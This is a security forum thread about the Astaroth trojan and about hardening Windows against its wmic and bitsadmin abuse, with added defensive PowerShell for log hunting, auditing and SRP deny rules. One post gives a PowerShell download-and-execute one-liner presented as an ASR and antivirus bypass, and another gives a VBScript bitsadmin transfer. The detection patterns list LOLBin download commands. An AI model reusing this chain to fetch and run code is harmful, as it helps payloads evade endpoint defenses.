This Trojan exploits antivirus software to steal your data

AtlBo

Dec 29, 2014
Comodo or NVT OSA should block this, but I'm not sure about when with Comodo. A couple of questions:

-Anyone know what Comodo would see this action to be when the .lnk is run? I suppose the browser?
-How is the dropped file activated...is it via instructions in the .lnk file?

I guess I am never going to get away from Comodo, not that I'm really trying. Just wish Viruscope would identify more activities as potentially malicious, like a net-facing file (especially a downloaded one) that wants to download, etc. Someday...

I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. It seems to harm performance for me, but I don't like having to install Sandboxie. No experience with the setup, and I think I would get lost...
 

notabot

Oct 31, 2018
It is sufficient for this malware and some more. But WD ASR can possibly be bypassed on Windows Home and Pro by PowerShell, for example:
Code:
powershell Import-Module bitstransfer;Start-BitsTransfer 'https://kcsoftwares.com/files/sumo_lite.exe' $home\Downloads\sumo_lite.exe;$filepath = $HOME + '\Downloads\sumo_lite.exe'; Invoke-WmiMethod -class win32_Process -Name Create -ArgumentList $filepath
Create the shortcut with this command and click the shortcut. It should download and execute the known & legal & useful SUMo installer. This should also bypass most AVs (anti-script modules).
The SUMo webpage:

This will be blocked by SRP though. ASR on its own is not sufficient for sure, but I wonder if blacklisting sponsors is really required or whether the native security mechanisms combined are sufficient.

Again, nothing wrong with blacklisting some sponsors whose behavior is clear and does not affect the system, but the task of compiling a policy for all sponsors is complex, and mistakes may break the system. If e.g. ASR+SRP (+others?) suffice, then it may make sense to stop there.
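The download-then-launch chain in the one-liner above leaves traces in logs Windows keeps anyway. As an added example (editor's code, not notabot's and not from the original post), the PowerShell below correlates Microsoft-Windows-Bits-Client/Operational events 59/60, whose message text carries the URL, with Security 4688 process-creation events whose command line references the sponsors discussed in this thread (bitsadmin /transfer, Start-BitsTransfer, wmic process call create, Invoke-WmiMethod). It assumes command-line auditing is enabled for 4688 and that event 59/60 messages have the form "BITS started the <job> transfer job that is associated with the <url> URL."; the function names are mine, and the sample events at the end are constructed, not captured, so the correlation can be tried without live logs.

```powershell
# Added example by the editor; not code from the original post, from notabot, or from
# the Astaroth sample. Hunts for the "BITS download, then WMI/wmic launch" chain using
# two logs Windows keeps by default:
#   Microsoft-Windows-Bits-Client/Operational, IDs 59/60: message carries the URL
#   Security 4688: process creation (command line only if command-line auditing is on)
# Function and variable names are mine; the sample events at the end are constructed.

$BitsUrlPattern = 'associated with the (?<url>\S+) URL'

# Command-line fragments the thread discusses as download / launch sponsors.
$SuspectCommandPattern = '(bitsadmin(\.exe)?\s+/transfer|Start-BitsTransfer|Import-Module\s+bitstransfer|wmic(\.exe)?\s.*process\s+call\s+create|Invoke-WmiMethod\s.*win32_process)'

function Get-BitsUrlFromMessage {
    param([Parameter(Mandatory)][string]$Message)
    if ($Message -match $BitsUrlPattern) { return $Matches['url'] }
    return $null
}

function Test-SuspectCommandLine {
    param([AllowEmptyString()][string]$CommandLine)
    return [bool]($CommandLine -match $SuspectCommandPattern)   # -match is case-insensitive
}

function Find-BitsDownloadChain {
    # Pairs every suspect process creation with BITS transfers that started within
    # $WindowSeconds of it. The transfer itself is done by the BITS service (SYSTEM),
    # so the correlation is by time, not by process id.
    param(
        [Parameter(Mandatory)][object[]]$BitsEvents,     # TimeCreated, Message
        [Parameter(Mandatory)][object[]]$ProcessEvents,  # TimeCreated, User, CommandLine
        [int]$WindowSeconds = 120
    )
    foreach ($p in $ProcessEvents) {
        if (-not (Test-SuspectCommandLine $p.CommandLine)) { continue }
        foreach ($b in $BitsEvents) {
            if ([math]::Abs(($b.TimeCreated - $p.TimeCreated).TotalSeconds) -gt $WindowSeconds) { continue }
            [pscustomobject]@{
                Time        = $p.TimeCreated
                User        = $p.User
                CommandLine = $p.CommandLine
                Url         = Get-BitsUrlFromMessage $b.Message
            }
        }
    }
}

function Get-LiveEvents {
    # Live collection; Windows only, and the Security log needs an elevated prompt.
    $bits = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Bits-Client/Operational'; Id = 59, 60 } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
    $procs = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml(); $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{ TimeCreated = $_.TimeCreated; User = $d['SubjectUserName']; CommandLine = $d['CommandLine'] }
        }
    return @{ Bits = @($bits); Procs = @($procs) }
}

# Constructed sample events (not captured logs) that mirror the one-liner in the post.
$t = Get-Date
$sampleBits = @(
    [pscustomobject]@{ TimeCreated = $t; Message = 'BITS started the BITS Transfer transfer job that is associated with the https://kcsoftwares.com/files/sumo_lite.exe URL.' }
)
$sampleProcs = @(
    [pscustomobject]@{ TimeCreated = $t.AddSeconds(2);  User = 'user1';  CommandLine = 'powershell Import-Module bitstransfer;Start-BitsTransfer https://kcsoftwares.com/files/sumo_lite.exe C:\Users\user1\Downloads\sumo_lite.exe' },
    [pscustomobject]@{ TimeCreated = $t.AddSeconds(20); User = 'user1';  CommandLine = 'wmic.exe process call create C:\Users\user1\Downloads\sumo_lite.exe' },
    [pscustomobject]@{ TimeCreated = $t.AddHours(3);    User = 'SYSTEM'; CommandLine = 'C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS' }
)
Find-BitsDownloadChain -BitsEvents $sampleBits -ProcessEvents $sampleProcs | Format-Table -AutoSize
```

On a live box, replace the constructed arrays with `$e = Get-LiveEvents` and call `Find-BitsDownloadChain -BitsEvents $e.Bits -ProcessEvents $e.Procs`. The svchost row exists to show why the correlation is by time and user rather than by process: the process that opens the socket is the service host, which is the same reason a per-executable firewall rule is discussed later in the thread as ineffective.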
 

Andy Ful

From Hard_Configurator Tools
Dec 23, 2014
I think the most effective thing would be a sandbox..... Astaroth can't help it.
Or if it can?
It cannot infect the system when the user has run the shortcut in the sandbox. But it can gather and send information to the remote server (except in a sandbox with the Internet connection blocked). Furthermore, the malware works invisibly, so the user may think that it cannot run in the sandbox and may be fooled into running it outside the sandbox.
I am not sure if the Comodo Firewall sandbox can stop the injection of the unsafe DLL by the legitimate Windows or Avast tools.
 

Andy Ful

From Hard_Configurator Tools
Dec 23, 2014
If wmic.exe and bitsadmin.exe are blocked from executing with a HIPS rule, will there be any problems with launching legitimate applications?
Those executables are hardly used by user applications or the Windows system. There should not be any problems with blocking them.
 

shmu26

Jul 3, 2015
Sometimes bitsadmin is needed for Windows updates. It has a warning sign in SysHardener. I would not want to block it through the firewall; I prefer to block it through Hard_Configurator, so it will still be able to function when the system needs it.

But if you have a good default-deny that starts working quickly after reboot, then the payload will be blocked anyway. Even if bitsadmin downloaded it, it won't be able to run. Hard_Configurator is good for that, too.

Lockdown used to always say that blocking bitsadmin through the firewall won't work, because at the firewall level Windows sees it as SYSTEM, not as bitsadmin. So it will fly right by your firewall rule.
 

Andy Ful

From Hard_Configurator Tools
Dec 23, 2014
.. I wonder if blacklisting sponsors is really required or whether the native security mechanisms combined are sufficient.

Again, nothing wrong with blacklisting some sponsors whose behavior is clear and does not affect the system, but the task of compiling a policy for all sponsors is complex, and mistakes may break the system. If e.g. ASR+SRP (+others?) suffice, then it may make sense to stop there.
As I said, you can block shortcuts via SRP, but doing this in the proper way will require a good knowledge of SRP. Most people allow shortcuts in SRP.

Blocking many sponsors as administrator can be dangerous.
But SRP can block them as a standard user.
 

bribon77

Jul 6, 2017
I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. It seems to harm performance for me, but I don't like having to install Sandboxie. No experience with the setup, and I think I would get lost...
1: Comodo Sandbox: no need to use it for everything; it can be used occasionally for mail and suspicious pages.
2: As for Sandboxie, the free version is very easy: just configure delete-on-exit and you are ready.
 

Moonhorse

May 29, 2018
Comodo or NVT OSA should block this, but I'm not sure about when with Comodo. A couple of questions:

-Anyone know what Comodo would see this action to be when the .lnk is run? I suppose the browser?
-How is the dropped file activated...is it via instructions in the .lnk file?

I guess I am never going to get away from Comodo, not that I'm really trying. Just wish Viruscope would identify more activities as potentially malicious, like a net-facing file (especially a downloaded one) that wants to download, etc. Someday...

I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. It seems to harm performance for me, but I don't like having to install Sandboxie. No experience with the setup, and I think I would get lost...
I never ran the Comodo sandbox myself with CS settings, since it runs the browser as rejected without an internet connection, lol.

Sandboxie Free is easy to use and doesn't slow anything down. I used it with the Basilisk browser and it was working pretty well. Have you completely gotten rid of Qihoo 360? I liked the Qihoo sandbox when I tried it.
 

notabot

Oct 31, 2018
As I said, you can block shortcuts via SRP, but doing this in the proper way will require a good knowledge of SRP. Most people allow shortcuts in SRP.

Blocking many sponsors as administrator can be dangerous.
But SRP can block them as a standard user.

No need to block it for admin; a user should use a SUA for day-to-day work. Shortcut SRP is probably needed (see below for a weaker alternative).

Assuming only administrative tasks happen as admin and there is no bypass for the native mechanisms, it becomes a question whether the below leaves anything open:

UAC+ASR+SRP(incl shortcuts)+Powershell constrained mode

I don't think it does, but of course it needs a thorough analysis of the attack vectors to confirm or reject the statement.

A weaker version of this is:

UAC+ASR+SRP(without shortcuts)+Powershell constrained & only signed+block only Powershell in Windows Firewall

This does block one LOLBin, but just a single one, PowerShell; for everything else it relies on UAC+ASR+SRP.

Maybe the weaker version suffices as well.

Edit: the weaker version does not suffice as is, but perhaps it's worth checking what is missing (e.g. would adding DEP suffice?).
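Whether the stack above leaves anything open starts with knowing what the machine actually has configured. As an added example (editor's code, not notabot's and not from the original post), the PowerShell below is a read-only audit of each layer named in the post: UAC settings, the Defender ASR rules that bear on a .lnk -> wmic/bitsadmin -> executable chain, the SRP policy including whether LNK is one of its controlled file types (the "incl shortcuts" distinction), and the PowerShell language mode. It assumes an elevated session on Windows 10/11 with Defender as the active AV (ASR is not enforced otherwise), that the GUIDs are Microsoft's published ASR rule IDs, and that `__PSLockdownPolicy` is the environment-variable way of forcing Constrained Language Mode, which Microsoft does not treat as a security boundary (AppLocker/WDAC is the supported way). Function names are mine.

```powershell
# Added example by the editor; not code from the original post. Read-only audit of the
# stack proposed above (UAC + ASR + SRP incl. shortcuts + PowerShell constrained mode).
# Assumptions: elevated PowerShell on Windows 10/11 with Defender as the active AV (ASR is
# not enforced otherwise); the GUIDs are Microsoft's published ASR rule IDs; __PSLockdownPolicy
# is the environment-variable way to force Constrained Language Mode, which Microsoft does
# not treat as a security boundary (AppLocker/WDAC is the supported way). Names are mine.

function Get-UacState {
    $p = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA                   # 1 = UAC on
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin  # 2 = always prompt, 5 = default
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop       # 1 = prompt cannot be driven by user-mode code
    }
}

function Get-AsrState {
    # ASR rules that bear on a .lnk -> wmic/bitsadmin -> executable chain.
    $relevant = [ordered]@{
        'd1e49aac-8f56-4280-b9ba-993a6d77406c' = 'Block process creations from PSExec and WMI commands'
        'd3e037e1-3eb8-44c8-a917-57927947596d' = 'Block JavaScript/VBScript from launching downloaded executable content'
        '5beb7efe-fd9a-4556-801d-275e5ffc04cc' = 'Block execution of potentially obfuscated scripts'
        'be9ba2d9-53ea-4cdc-84e5-9b1eeee46550' = 'Block executable content from email client and webmail'
    }
    $pref    = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids | Where-Object { $_ })
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    $state   = @{}
    for ($i = 0; $i -lt $ids.Count; $i++) { $state[([string]$ids[$i]).ToLower()] = [int]$actions[$i] }
    foreach ($id in $relevant.Keys) {
        $a = if ($state.ContainsKey($id)) { $state[$id] } else { 0 }   # unset = not enforced
        [pscustomobject]@{
            Rule   = $relevant[$id]
            Action = switch ($a) { 0 { 'Disabled' } 1 { 'Block' } 2 { 'Audit' } 6 { 'Warn' } default { "Unknown($a)" } }
        }
    }
}

function Get-SrpState {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers'
    if (-not (Test-Path $base)) { return [pscustomobject]@{ Configured = $false } }
    $p = Get-ItemProperty $base
    # Security level 0 = Disallowed; its path rules are GUID-named subkeys with ItemData.
    $disallowed = Get-ChildItem (Join-Path $base '0\Paths') -ErrorAction SilentlyContinue |
        ForEach-Object { (Get-ItemProperty $_.PSPath).ItemData }
    [pscustomobject]@{
        Configured       = $true
        DefaultLevel     = switch ($p.DefaultLevel) { 0 { 'Disallowed' } 0x20000 { 'Basic User' } 0x40000 { 'Unrestricted' } default { $p.DefaultLevel } }
        AppliesToAdmins  = ($p.PolicyScope -ne 1)          # PolicyScope 1 = all users except local administrators
        DllsEnforced     = ($p.TransparentEnabled -eq 2)   # 2 = all files incl. DLLs, 1 = executables only
        ShortcutsCovered = (@($p.ExecutableTypes) -contains 'LNK')   # "SRP incl shortcuts" in the post
        DisallowedPaths  = @($disallowed)
    }
}

function Get-PsLanguageState {
    [pscustomobject]@{
        CurrentSessionMode = $ExecutionContext.SessionState.LanguageMode
        MachineLockdown    = [Environment]::GetEnvironmentVariable('__PSLockdownPolicy', 'Machine')  # 4 = Constrained
        ExecutionPolicy    = Get-ExecutionPolicy -Scope LocalMachine
    }
}

'UAC';        Get-UacState        | Format-List
'ASR';        Get-AsrState        | Format-Table -AutoSize
'SRP';        Get-SrpState        | Format-List
'PowerShell'; Get-PsLanguageState | Format-List
```

The first ASR rule in the list is the one that matters for the wmic launch in this thread; if it shows `Disabled` or `Audit`, the chain is not blocked by ASR regardless of the other layers. `ShortcutsCovered` reports only whether LNK is in SRP's designated file types; with a Disallowed default level that also affects Start menu and desktop shortcuts, which is why the post notes most people leave shortcuts allowed.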
 

ForgottenSeer 69673

This malware does not run any installed application, but directly execute wmic.exe when the user clicked on the shortcut.
This is how I cover wmic.
[screenshot attachment not reproduced]
 

Andy Ful

From Hard_Configurator Tools
Dec 23, 2014
Sometimes bitsadmin is needed for Windows updates. It has a warning sign in SysHardener. I would not want to block it through the firewall; I prefer to block it through Hard_Configurator, so it will still be able to function when the system needs it.

But if you have a good default-deny that starts working quickly after reboot, then the payload will be blocked anyway. Even if bitsadmin downloaded it, it won't be able to run. Hard_Configurator is good for that, too.

Lockdown used to always say that blocking bitsadmin through the firewall won't work, because at the firewall level Windows sees it as SYSTEM, not as bitsadmin. So it will fly right by your firewall rule.
Windows Update can use the Background Intelligent Transfer Service (BITS) to download updates, but does not use bitsadmin.exe for that. BITS cannot be blocked by Windows Firewall or SRP, but bitsadmin.exe can be blocked by SRP, because the malware runs it with standard user rights. The download initiated by bitsadmin.exe cannot be blocked by Windows Firewall, because it is not bitsadmin.exe that downloads the file, but the Background Intelligent Transfer Service.
You can check it yourself by running the script below and looking at Process Explorer to see the integrity level of bitsadmin.exe:
Code:
' Launch bitsadmin.exe from VBScript, the way a shortcut would (standard user rights).
Set WshShell = CreateObject("WScript.Shell")
' /transfer only submits the job; the download itself is performed by the BITS service, not by bitsadmin.exe.
WshShell.Run "bitsadmin.exe /transfer JobName https://kcsoftwares.com/files/sumo_lite.exe C:\Users\Admin\Downloads\sumo_lite.exe"
' Keep the script alive for a moment so bitsadmin.exe can be observed in Process Explorer.
WScript.Sleep 10000

The script can also be used to confirm that the download initiated by bitsadmin.exe cannot be blocked by the Windows Firewall rule, like @shmu26 said.


Post edited.
I confirmed myself that the download initiated by bitsadmin.exe cannot be stopped by the firewall rule for bitsadmin.exe. Before that, I wrongly thought that it could be stopped by the firewall, because it runs with standard user rights. But in fact the download is done by something else (the Background Intelligent Transfer Service).
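Two things from this thread can be reproduced with one script: the firewall rule that does not work, and the SRP rule that does. As an added example (editor's code, not Andy Ful's and not from the original post), the PowerShell below first creates an outbound block rule for bitsadmin.exe, runs a transfer of the thread's own test file, and reports which process actually held the transfer (the svchost.exe hosting the BITS service, running as SYSTEM); it then writes SRP path rules that disallow bitsadmin.exe and wmic.exe for standard users only, which is the "SRP can block them as a standard user" point made earlier. It assumes an elevated session on Windows 10/11 and the documented SRP registry layout under HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers (the same mechanism Hard_Configurator drives); function names and the job name are mine.

```powershell
# Added example by the editor; not code from the original post. Part 1 reproduces the
# finding above: a Windows Firewall rule keyed on bitsadmin.exe does not stop the
# download, because the socket belongs to the BITS service (svchost.exe, SYSTEM).
# Part 2 does what the thread says works: SRP path rules that disallow bitsadmin.exe
# and wmic.exe for standard users only (PolicyScope 1 exempts local administrators).
# Assumptions: elevated PowerShell on Windows 10/11; the URL is the thread's own test
# file; the registry layout is SRP's documented one. Names are mine.

$Url  = 'https://kcsoftwares.com/files/sumo_lite.exe'
$Dest = Join-Path $HOME 'Downloads\sumo_lite.exe'

function Test-FirewallRuleAgainstBits {
    $rule = New-NetFirewallRule -DisplayName 'Block bitsadmin.exe (experiment)' -Direction Outbound `
        -Program "$env:SystemRoot\System32\bitsadmin.exe" -Action Block
    try {
        # bitsadmin.exe only submits the job; the transfer is performed by the service.
        & "$env:SystemRoot\System32\bitsadmin.exe" /transfer SrpTest /download /priority foreground $Url $Dest | Out-Null
        $bitsPid = (Get-CimInstance Win32_Service -Filter "Name='BITS'").ProcessId
        [pscustomobject]@{
            Downloaded      = Test-Path $Dest                          # true despite the block rule
            TransferringPid = $bitsPid
            TransferringExe = (Get-Process -Id $bitsPid).ProcessName   # svchost, not bitsadmin
        }
    } finally {
        Remove-NetFirewallRule -Name $rule.Name
        Remove-Item $Dest -ErrorAction SilentlyContinue
    }
}

function Add-SrpDisallowRule {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$Description = 'Disallowed for standard users'
    )
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers'
    if (-not (Test-Path $base)) { New-Item -Path $base -Force | Out-Null }
    # Policy-wide values: default level Unrestricted (0x40000) so only the listed paths
    # are affected; TransparentEnabled 1 = all executable types except DLLs;
    # PolicyScope 1 = all users except local administrators.
    Set-ItemProperty -Path $base -Name DefaultLevel       -Value 0x40000 -Type DWord
    Set-ItemProperty -Path $base -Name TransparentEnabled -Value 1       -Type DWord
    Set-ItemProperty -Path $base -Name PolicyScope        -Value 1       -Type DWord
    # Security level 0 = Disallowed; each path rule is a GUID-named subkey under it.
    $ruleKey = Join-Path $base ('0\Paths\{' + [guid]::NewGuid().ToString() + '}')
    New-Item -Path $ruleKey -Force | Out-Null
    Set-ItemProperty -Path $ruleKey -Name ItemData     -Value $Path        -Type ExpandString
    Set-ItemProperty -Path $ruleKey -Name SaferFlags   -Value 0            -Type DWord
    Set-ItemProperty -Path $ruleKey -Name Description  -Value $Description -Type String
    Set-ItemProperty -Path $ruleKey -Name LastModified -Value ([datetime]::Now.ToFileTime()) -Type QWord
    return $ruleKey
}

# Part 1: the firewall experiment.
Test-FirewallRuleAgainstBits | Format-List

# Part 2: both bitnesses of each sponsor; note wmic.exe lives under wbem\.
foreach ($p in '%SystemRoot%\System32\bitsadmin.exe', '%SystemRoot%\SysWOW64\bitsadmin.exe',
               '%SystemRoot%\System32\wbem\wmic.exe', '%SystemRoot%\SysWOW64\wbem\wmic.exe') {
    Add-SrpDisallowRule -Path $p
}
# Verify from a fresh standard-user logon: bitsadmin.exe and wmic.exe are refused with
# "This program is blocked by group policy"; an administrator's session is unaffected.
```

The firewall part is deliberately left in to show the negative result rather than just assert it: `Downloaded` comes back true while the only process that ever touched the network is the svchost.exe in `TransferringExe`. The SRP part does not touch administrators, which matches the warning earlier in the thread that blocking sponsors as administrator can break things; the price is that anything the user runs elevated is still free to use bitsadmin and wmic.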
 

Wraith

Aug 15, 2018
NVT SysHardener, NVT OSA, and H_C will block this malware.
Sorry for the dumb question, but can you please explain to me how they will stop the malware? Does SysHardener disable wmic/bitsadmin? And does OSA monitor wmic and bitsadmin? H_C at default-deny should stop the execution of the malicious .lnk shortcut file, right?
 
